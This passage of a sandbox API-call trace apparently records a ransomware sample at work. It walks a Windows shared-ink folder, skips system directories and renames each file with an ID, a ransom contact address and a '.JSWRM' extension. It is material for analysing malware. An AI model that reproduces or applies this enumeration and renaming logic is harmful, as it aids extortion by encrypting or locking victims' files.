CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0067.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.880] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe.mui", cAlternateFileName="")) returned 1 [0067.880] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2=".") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="..") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="...") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="windows") returned -1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="recovery") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="perflogs") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="documents and settings") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="system volume information") returned 1 [0067.881] lstrcmpiW (lpString1="TabTip.exe.mui", lpString2="msocache") returned 1 [0067.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabTip.exe.mui", lpUsedDefaultChar=0x0) returned 14 [0067.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0067.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabTip.exe.mui", lpUsedDefaultChar=0x0) returned 14 [0067.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.881] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.881] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.881] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.881] CloseHandle (hObject=0xffffffff) returned 1 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.882] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.882] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffe6194, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7c896e00, ftLastWriteTime.dwHighDateTime=0x1d29fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2=".") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="..") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="...") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="windows") returned -1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="recovery") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="perflogs") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="documents and settings") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="system volume information") returned 1 [0067.882] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="msocache") returned 1 [0067.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0067.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0067.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.883] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0067.883] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.884] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.884] CloseHandle (hObject=0xffffffff) returned 1 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0067.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.884] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.884] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.885] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.885] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.885] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.885] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0067.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.885] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088912540391208) returned 0 [0067.885] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.885] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.885] CloseHandle (hObject=0xffffffff) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0067.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.886] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2=".") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="..") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="...") returned 1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="windows") returned -1 [0067.886] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="recovery") returned 1 [0067.886] 